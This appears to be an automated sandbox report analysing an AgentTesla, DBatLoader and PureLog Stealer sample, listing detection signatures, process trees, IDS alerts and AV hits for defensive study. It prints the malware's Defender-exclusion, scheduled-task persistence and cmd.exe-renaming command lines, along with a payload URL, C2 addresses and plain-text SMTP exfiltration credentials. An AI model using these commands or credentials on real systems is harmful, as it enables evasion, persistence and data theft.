
Windows Analysis Report
C6dAUcOA6M.exe

Overview

General Information

Sample name: C6dAUcOA6M.exe
(renamed because the original name is a hash value)
Original sample name: 0161d30defee14b9bdac49068c63a344320c11330acdfc10952c025637684adb.exe
Analysis ID: 1562865
MD5: 53f0663219e6091cecd600c59389711f
SHA1: f1986a61c2cb0107444fbd3e8075a25e21fb26ca
SHA256: 0161d30defee14b9bdac49068c63a344320c11330acdfc10952c025637684adb
Tags: doganalecmdexeuser-JAMESWT_MHT

Detection

AgentTesla, DBatLoader, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected DBatLoader
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates files in the system32 config directory
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops large PE files
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries random domain names (often used to prevent blacklisting and sinkholes)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to many different domains
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Spawns drivers
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • C6dAUcOA6M.exe (PID: 7852 cmdline: "C:\Users\user\Desktop\C6dAUcOA6M.exe" MD5: 53F0663219E6091CECD600C59389711F)
    • cmd.exe (PID: 8080 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • esentutl.exe (PID: 8132 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 8160 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • alpha.pif (PID: 8188 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 7376 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 5844 cmdline: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • xpha.pif (PID: 5860 cmdline: C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • alpha.pif (PID: 5076 cmdline: C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 4768 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 2632 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • esentutl.exe (PID: 7228 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\C6dAUcOA6M.exe /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
      • conhost.exe (PID: 7256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aymtmquJ.pif (PID: 7380 cmdline: C:\Users\Public\Libraries\aymtmquJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • Native_neworigin.exe (PID: 3976 cmdline: "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" MD5: 9ECE2AAE8E8FA77849268DDA20CAEC7B)
      • Trading_AIBot.exe (PID: 2112 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
        • powershell.exe (PID: 7624 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 2596 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • schtasks.exe (PID: 7904 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • apihost.exe (PID: 7048 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" MD5: A89798786670C9BBB806311854859FF3)
  • alg.exe (PID: 6072 cmdline: C:\Windows\System32\alg.exe MD5: E471E4037B76A28D3D82E42538FC3807)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 1076 cmdline: C:\Windows\system32\AppVClient.exe MD5: 907DB1B5C7DE81B95CC62375B2502582)
  • FXSSVC.exe (PID: 3508 cmdline: C:\Windows\system32\fxssvc.exe MD5: BB9DE1AD24CC587EB4D9FB9CF61AE13B)
  • Juqmtmya.PIF (PID: 4460 cmdline: "C:\Users\Public\Libraries\Juqmtmya.PIF" MD5: 53F0663219E6091CECD600C59389711F)
    • aymtmquJ.pif (PID: 4688 cmdline: C:\Users\Public\Libraries\aymtmquJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • Native_neworigin.exe (PID: 5088 cmdline: "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" MD5: 9ECE2AAE8E8FA77849268DDA20CAEC7B)
      • Trading_AIBot.exe (PID: 4868 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
  • Juqmtmya.PIF (PID: 5836 cmdline: "C:\Users\Public\Libraries\Juqmtmya.PIF" MD5: 53F0663219E6091CECD600C59389711F)
    • aymtmquJ.pif (PID: 7404 cmdline: C:\Users\Public\Libraries\aymtmquJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • Native_neworigin.exe (PID: 7892 cmdline: "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" MD5: 9ECE2AAE8E8FA77849268DDA20CAEC7B)
      • Trading_AIBot.exe (PID: 7024 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
  • maintenanceservice.exe (PID: 5616 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: C00D0B962E95984AE63736DD9A6F990E)
  • cleanup
Malware family information (Name, Description, Attribution, Link):

Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
{"Download Url": ["https://gxe0.com/yak2/233_Juqmtmyadyy"]}
{"Exfil Mode": "SMTP", "Host": "s82.gocheapweb.com\"", "Username": "info2@j-fores.com", "Password": "london@1759 "}
Yara matches in memory dumps (Source, Rule, Description, Author, Strings):

Source: 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_DBatLoader; Description: Yara detected DBatLoader; Author: Joe Security
Source: 0000000D.00000002.1760923102.0000000005120000.00000004.08000000.00040000.00000000.sdmp; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security
Source: 00000020.00000002.1821621079.0000000002A76000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security
Source: 00000020.00000002.1846740962.0000000004F70000.00000004.08000000.00040000.00000000.sdmp; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security
Source: 00000020.00000002.1832128642.0000000002E71000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security

Yara matches in unpacked PE files (Source, Rule, Description, Author, Strings):

Source: 32.2.Native_neworigin.exe.4f70000.7.unpack; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security
Source: 13.0.Native_neworigin.exe.400000.0.unpack; Rule: MALWARE_Win_RedLine; Description: Detects RedLine infostealer; Author: ditekSHen; Strings:
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 33 88 44 24 2B 88 44 24 2F B0 50 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security
Source: 13.2.Native_neworigin.exe.2b66216.1.raw.unpack; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security
Source: 13.2.Native_neworigin.exe.3f3c190.3.raw.unpack; Rule: JoeSecurity_PureLogStealer; Description: Yara detected PureLog Stealer; Author: Joe Security

                    System Summary

Source: File created; Author: frack113, Nasreddine Bencherchali; Data: EventID: 11, Image: C:\Users\user\Desktop\C6dAUcOA6M.exe, ProcessId: 7852, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.pif, NewProcessName: C:\Users\Public\alpha.pif, OriginalFileName: C:\Users\Public\alpha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8080, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , ProcessId: 8188, ProcessName: alpha.pif
Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: C:\Users\Public\Juqmtmya.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\C6dAUcOA6M.exe, ProcessId: 7852, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Juqmtmya
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2112, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 7624, ProcessName: powershell.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\Public\Juqmtmya.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\C6dAUcOA6M.exe, ProcessId: 7852, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Juqmtmya
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.pif, NewProcessName: C:\Users\Public\alpha.pif, OriginalFileName: C:\Users\Public\alpha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8080, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , ProcessId: 8188, ProcessName: alpha.pif
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2112, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 7624, ProcessName: powershell.exe
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 2112, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2112, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f, ProcessId: 7904, ProcessName: schtasks.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe, Initiated: true, ProcessId: 3976, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49774
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2112, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f, ProcessId: 7904, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2112, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 7624, ProcessName: powershell.exe
Suricata IDS alerts (Timestamp, SID, Severity, Classtype, Source IP:Port -> Destination IP:Port, Protocol):

2024-11-26T08:12:12.573946+0100  SID 2028371  Severity 3  Unknown Traffic  192.168.2.10:49708 -> 198.252.105.91:443  TCP

2024-11-26T08:12:41.335413+0100  SID 2051649  Severity 1  A Network Trojan was detected  192.168.2.10:55012 -> 1.1.1.1:53  UDP
2024-11-26T08:12:47.189936+0100  SID 2051649  Severity 1  A Network Trojan was detected  192.168.2.10:52903 -> 1.1.1.1:53  UDP
2024-11-26T08:13:10.876049+0100  SID 2051649  Severity 1  A Network Trojan was detected  192.168.2.10:64255 -> 1.1.1.1:53  UDP

2024-11-26T08:12:37.384307+0100  SID 2051648  Severity 1  A Network Trojan was detected  192.168.2.10:54094 -> 1.1.1.1:53  UDP
2024-11-26T08:12:40.975891+0100  SID 2051648  Severity 1  A Network Trojan was detected  192.168.2.10:55974 -> 1.1.1.1:53  UDP
2024-11-26T08:13:07.874186+0100  SID 2051648  Severity 1  A Network Trojan was detected  192.168.2.10:54498 -> 1.1.1.1:53  UDP

2024-11-26T08:12:28.611072+0100  SID 2018141  Severity 1  A Network Trojan was detected  54.244.188.177:80 -> 192.168.2.10:49744  TCP
2024-11-26T08:12:32.627342+0100  SID 2018141  Severity 1  A Network Trojan was detected  18.141.10.107:80 -> 192.168.2.10:49757  TCP
2024-11-26T08:12:37.495356+0100  SID 2018141  Severity 1  A Network Trojan was detected  44.221.84.105:80 -> 192.168.2.10:49773  TCP
2024-11-26T08:14:39.886220+0100  SID 2018141  Severity 1  A Network Trojan was detected  34.246.200.160:80 -> 192.168.2.10:50015  TCP
2024-11-26T08:14:41.732453+0100  SID 2018141  Severity 1  A Network Trojan was detected  18.208.156.248:80 -> 192.168.2.10:50017  TCP
2024-11-26T08:14:42.324768+0100  SID 2018141  Severity 1  A Network Trojan was detected  47.129.31.212:80 -> 192.168.2.10:50016  TCP
2024-11-26T08:14:44.673882+0100  SID 2018141  Severity 1  A Network Trojan was detected  13.251.16.150:80 -> 192.168.2.10:50018  TCP
2024-11-26T08:14:53.634411+0100  SID 2018141  Severity 1  A Network Trojan was detected  35.164.78.200:80 -> 192.168.2.10:50029  TCP
2024-11-26T08:14:55.447711+0100  SID 2018141  Severity 1  A Network Trojan was detected  3.94.10.34:80 -> 192.168.2.10:50031  TCP
2024-11-26T08:15:39.125752+0100  SID 2018141  Severity 1  A Network Trojan was detected  18.246.231.120:80 -> 192.168.2.10:50077  TCP
2024-11-26T08:15:41.242825+0100  SID 2018141  Severity 1  A Network Trojan was detected  3.254.94.185:80 -> 192.168.2.10:50078  TCP
2024-11-26T08:15:48.948405+0100  SID 2018141  Severity 1  A Network Trojan was detected  34.211.97.45:80 -> 192.168.2.10:50086  TCP

2024-11-26T08:12:28.611072+0100  SID 2037771  Severity 1  A Network Trojan was detected  54.244.188.177:80 -> 192.168.2.10:49744  TCP
2024-11-26T08:12:32.627342+0100  SID 2037771  Severity 1  A Network Trojan was detected  18.141.10.107:80 -> 192.168.2.10:49757  TCP
2024-11-26T08:12:37.495356+0100  SID 2037771  Severity 1  A Network Trojan was detected  44.221.84.105:80 -> 192.168.2.10:49773  TCP
2024-11-26T08:14:39.886220+0100  SID 2037771  Severity 1  A Network Trojan was detected  34.246.200.160:80 -> 192.168.2.10:50015  TCP
2024-11-26T08:14:41.732453+0100  SID 2037771  Severity 1  A Network Trojan was detected  18.208.156.248:80 -> 192.168.2.10:50017  TCP
2024-11-26T08:14:42.324768+0100  SID 2037771  Severity 1  A Network Trojan was detected  47.129.31.212:80 -> 192.168.2.10:50016  TCP
2024-11-26T08:14:44.673882+0100  SID 2037771  Severity 1  A Network Trojan was detected  13.251.16.150:80 -> 192.168.2.10:50018  TCP
2024-11-26T08:14:53.634411+0100  SID 2037771  Severity 1  A Network Trojan was detected  35.164.78.200:80 -> 192.168.2.10:50029  TCP
2024-11-26T08:14:55.447711+0100  SID 2037771  Severity 1  A Network Trojan was detected  3.94.10.34:80 -> 192.168.2.10:50031  TCP
2024-11-26T08:15:39.125752+0100  SID 2037771  Severity 1  A Network Trojan was detected  18.246.231.120:80 -> 192.168.2.10:50077  TCP
2024-11-26T08:15:41.242825+0100  SID 2037771  Severity 1  A Network Trojan was detected  3.254.94.185:80 -> 192.168.2.10:50078  TCP
2024-11-26T08:15:48.948405+0100  SID 2037771  Severity 1  A Network Trojan was detected  34.211.97.45:80 -> 192.168.2.10:50086  TCP

2024-11-26T08:12:31.363417+0100  SID 2850851  Severity 1  Malware Command and Control Activity Detected  192.168.2.10:49753 -> 54.244.188.177:80  TCP
2024-11-26T08:13:32.576759+0100  SID 2850851  Severity 1  Malware Command and Control Activity Detected  192.168.2.10:49867 -> 82.112.184.197:80  TCP
2024-11-26T08:14:33.633509+0100  SID 2850851  Severity 1  Malware Command and Control Activity Detected  192.168.2.10:50012 -> 18.141.10.107:80  TCP
2024-11-26T08:15:39.005596+0100  SID 2850851  Severity 1  Malware Command and Control Activity Detected  192.168.2.10:50077 -> 18.246.231.120:80  TCP


                    AV Detection

Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe; Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe; Avira: detection malicious, Label: W32/Infector.Gen
